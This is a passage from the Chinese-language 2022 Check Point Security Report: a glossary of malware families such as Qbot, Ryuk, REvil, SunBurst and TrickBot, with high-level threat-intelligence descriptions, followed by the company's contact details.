他们的 C&C 下载任何额外的有效负载。

NanoCore NanoCore 是一种远程访问木马病毒,目标是 Windows 操作系统用户,2013 年首次被发 现。RAT 的所有版本都包含基本的插件和功能,如屏幕截图、加密货币挖矿、远程控制桌 面和网络摄像头会话窃取。

70CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

NRSMiner NRSMiner 是一种加密货币挖掘软件,大约于 2018 年 11 月开始出现,主要在亚洲传播, 特别是越南、中国、日本和厄瓜多尔。完成初始感染后,它会利用臭名昭著的永恒之蓝 SMB 漏洞传播至内部网络中的其它易受攻击的计算机,最后开始挖掘 Monero (XMR) 加密 货币。

Pegasus Pegasus 是一款由以色列 NSO 组织开发的高度复杂的间谍软件,攻击对象为 Android 和 iOS 移动设备。该恶意软件可供出售,主要采购者包括与政府相关的组织和企业。Pegasus 可利用漏洞以静默方式破解设备并安装恶意软件。该恶意软件通过多种方式感染其目标,

比如利用鱼叉式钓鱼 SMS 消息,其中包含恶意链接或 URL 重定向设置,无需用户执行任 何操作(“零点击”)。该 App 具有多个间谍模块,例如截屏、通话录音、访问消息应用 程序、键盘记录和浏览器历史记录外泄等。

Phorpiex Phorpiex(又名 Trik)是自 2010 年活跃至今的僵尸网络,最猖獗时期一度操控逾百万台受 感染主机。它通过垃圾邮件活动分发其它系列的恶意软件,助长大规模垃圾邮件活动和性

勒索攻击活动的气焰,并以此声名鹊起。

Qbot Qbot 又名 QakBot,是首次出现于 2008 年的银行木马病毒,其设计初衷是为了窃取用户 的银行凭据和按键输入内容。Qbot 经常通过垃圾邮件进行分发,它采用了多种反虚拟机、 反调试和反沙盒技术来阻碍分析和躲避检测。

Raccoon Raccoon 信息窃取程序首次发现于 2019 年 4 月。该信息窃取程序以 Windows 系统为目 标,在地下论坛中作为 MaaS(恶意软件即服务)出售。这种简单的信息窃取程序能够收 集浏览器 Cookie、历史记录、登录凭据、加密货币钱包和信用卡信息。

Ragnar Locker Ragnar Locker 勒索软件首次发现于 2019 年 12 月。它采用了复杂的躲避技术,包括在目 标系统上部署虚拟机来隐藏其活动。Ragnar 曾被用于针对葡萄牙国家电力公司的双重勒索 行动,攻击者当时公布了从受害者那里窃取的敏感数据。

71CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

Ramnit Ramnit 模块化银行木马病毒首次发现于 2010 年。Ramnit 可以窃取 Web 会话信息,让操 纵者能够窃取受害者使用的所有服务的账户凭据,包括银行账户、企业账户和社交网络账

户。该木马病毒使用硬编码域以及由 DGA(域生成算法)生成的域来联系 C&C 服务器并 下载额外的模块。

RedLine Stealer RedLine Stealer 是一种趋势信息窃取程序,首次发现于 2020 年 3 月。该程序作为 MaaS (恶意软件即服务)出售,并且常通过恶意电子邮件附件分发,具有现代信息窃取程序的

所有功能,包括收集 Web 浏览器信息(信用卡详细信息、会话 Cookie 和自动完成数据)、 收集加密货币钱包信息、下载额外的有效负载等等。

Remcos Remcos 是一种首次发现于 2016 年的远程访问木马病毒 (RAT)。Remcos 通过附加在垃 圾邮件中的恶意 Microsoft Office 文档进行自我分发,它被设计成绕过 Microsoft Windows UAC 安全机制,以高级权限执行恶意软件。

RigEK RigEK 大约自 2014 年年中开始活跃,在当下各种漏洞利用工具包中大名鼎鼎,具有最悠 久的历史。其服务在黑客论坛和 TOR 网络上大肆售卖。一些“企业家”甚至会将小批量的 感染源倒卖给规模不足以提供全面服务的恶意软件开发人员。RigEK 经过多年的演变,能 够分发从 AZORult 和 Dridex 到鲜为人知的勒索软件及加密货币挖矿软件等各种内容。

RubyMiner RubyMiner 于 2018 年 1 月首次被发现,其目标是 Windows 和 Linux 服务器。RubyMiner 搜寻易受攻击的 Web 服务器(例如 PHP、Microsoft IIS 和 Ruby on Rails),通过开源 Monero 挖矿软件 XMRig,将这些服务器用于加密货币挖矿。

72CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

Ryuk 在 TrickBot 团伙以全球多个组织为目标精心策划的针对性攻击中,Ryuk 勒索软件大出风 头。该勒索软件最初源于 Hermes 勒索软件,技术含量相对较低,仅包含一个基础的植入 程序和一种简单的加密机制。尽管如此,Ryuk 却对目标组织造成了极大损害,迫使他们支 付了极高的比特币赎金。常见的勒索软件一般是通过大规模垃圾邮件活动和漏洞利用工具

包进行系统性分发,而 Ryuk 却独树一帜,专门用于针对性攻击。

Snake Keylogger Snake Keylogger 是一种模块化 .NET 键盘记录器/信息窃取程序。它在 2020 年底左右开 始出现,在网络犯罪分子中迅速流传开来。Snake 能够记录按键输入内容、截取屏幕、收 集凭据和剪贴板内容,支持通过 HTTP 和 SMTP 协议泄露被盗数据。

REvil REvil(又名 Sodinokibi)是一种通过“分销联盟”计划运行的勒索软件即服务,首次发现 于 2019 年。REvil 可以对用户目录中的数据进行加密,并删除卷影复制备份,从而增加用 户恢复数据的难度。此外,REvil 联盟成员还利用各种手段,通过发起垃圾邮件和服务器漏 洞攻击、入侵管理服务提供商 (MSP) 后端以及开展重定向至 RIG 漏洞利用工具包的恶意软 件活动进行传播。

SparrowDoor SparrowDoor 是 FamousSparrow APT 组织用来监视酒店、政府等的高级后门程序。它在 2021 年 3 月左右被发现利用 Microsoft Exchange ProxyLogon 漏洞。该后门程序利用 DLL 劫持与合法二进制文件加载相结合的方式,帮助绕过防病毒产品。

SunBurst SunBurst 是 2020 年在 SolarWinds 的 Orion IT 管理软件中植入的后门程序,作为恶名昭彰 的供应链攻击的一部分,对全球数千家组织发动袭击。它是一种永久性后门程序,为攻击者在组

织内部提供了初始立足点。如果受感染机器通过了所有要求,并且不包含各种已列入黑名单的服

务或防病毒软件,Sunburst 随后将会部署额外的内存植入代码(如 TearDrop),用于执行命令 以及进行横向移动。

73CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

Triada Triada 首次发现于 2016 年,是一种针对 Android 的模块化后门程序,可授予管理员权限, 以下载其它恶意软件。其最新版本通过 WhatsApp for Android 中的广告软件开发工具包进 行分发。

TrickBot TrickBot 是一种模块化银行木马程序,被认为由 WizardSpider 网络犯罪团伙使用。主要通 过垃圾邮件活动或 Emotet 和 BazarLoader 等其它恶意软件系列传播。TrickBot 发送有关 受感染系统的信息,还可以从提供的大量模块中下载和执行任意模块,包括用于远程控制

的 VNC 模块和用于在遭入侵网络中传播的 SMB 模块。计算机受到感染后,该恶意软件背 后的威胁执行者便大肆利用各种模块,不仅从目标 PC 窃取银行凭据,还会在目标组织内 横向移动及踩点,随后发动公司范围的定向勒索软件攻击。

Ursnif Ursnif 是针对 Windows 的 Gozi 银行木马病毒的变种,其源代码已在网上流出。它具有浏 览器中间人攻击 (man-in-browser) 功能,可以窃取流行在线服务的银行信息和凭据。此 外,它还可以从本地电子邮件客户端、浏览器和加密货币钱包中窃取信息。最后,该木马

病毒可以在受感染系统上下载和执行其它文件。

Vidar Vidar 是一个以 Windows 操作系统为目标的信息窃取木马。其于 2018 年年底首次被发现,旨在 从各种浏览器和数字钱包中窃取密码、信用卡数据和其它敏感信息。Vidar 在各种在线论坛上出 售,并被用作恶意软件植入程序,下载 GandCrab 勒索软件作为其辅助有效负载。

WannaMine WannaMine 是一种利用永恒之蓝漏洞进行传播的复杂 Monero 加密货币挖掘蠕虫。 WannaMine 利用 Windows 管理规范 (Windows Management Instrumentation, WMI) 永久 事件订阅执行传播机制和持久化技术。

74CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

xHelper xHelper 是一款 Android 恶意软件,主要用于显示侵入式弹出广告以及垃圾邮件通知。强大 的重新安装功能使其在安装后难以被移除。xHelper 首次发现于 2019 年 3 月,现已感染了 超 45,000 台设备。

XMRig XMRig 是一种用于 Monero 加密货币挖矿的开源 CPU 挖矿软件。威胁执行者经常滥用这 种开源软件,将其集成到恶意软件中,在受害者的设备上进行非法挖矿。

ZLoader ZLoader 是一种银行恶意软件,使用 Web 注入方式来窃取凭据和私人信息,并能从受害者 的 Web 浏览器中提取密码和 Cookie。威胁执行者通过下载 VNC 连接到受害者的系统,并 从用户的设备执行金融交易。它于 2016 年被首次发现,以 2011 年恶意软件 Zeus 泄露的 代码为基础。到 2020 年,这种恶意软件在威胁执行者中广为流行,还演变出了许多新的 变种。

z0Miner z0Miner 首次发现于 2020 年 11 月,是一种加密货币挖掘软件,出现在遭到 Oracle WebLogic 服务器远程代码执行漏洞恶意利用的数千台服务器上。z0Miner 幕后组织此后一直在利用 Atlassian Confluence RCE 漏洞 (CVE-2021-26084) 来感染其它服务器。

联系我们联系我们 全球总部全球总部

5 Ha’Solelim Street, Tel Aviv 67897, Israel 电话:972-3-753-4555 | 传真:972-3-624-1100 |

电子邮件:info@checkpoint.com

中国总部中国总部

上海市黄浦区延安东路 550 号海洋大厦 1806-1808 室 | 邮编:200020(86) 10 56379600 | www.checkpoint.com.cn

遭受攻击?遭受攻击?

请联系 Check Point 事件响应团队: emergency-response@checkpoint.com

CHECK POINT RESEARCH CHECK POINT RESEARCH 官方微信官方微信

请访问我们的网站 https://research.checkpoint.com/category/cpradio/

WWW.CHECKPOINT.COM.CNWWW.CHECKPOINT.COM.CN

© 1994-2022 Check Point Software Technologies Ltd. 保留所有权利。

CHAPTER 1: INTRODUCTION TO THE CHECK POINT 2022 SECURITY REPORT


Item Type: pdf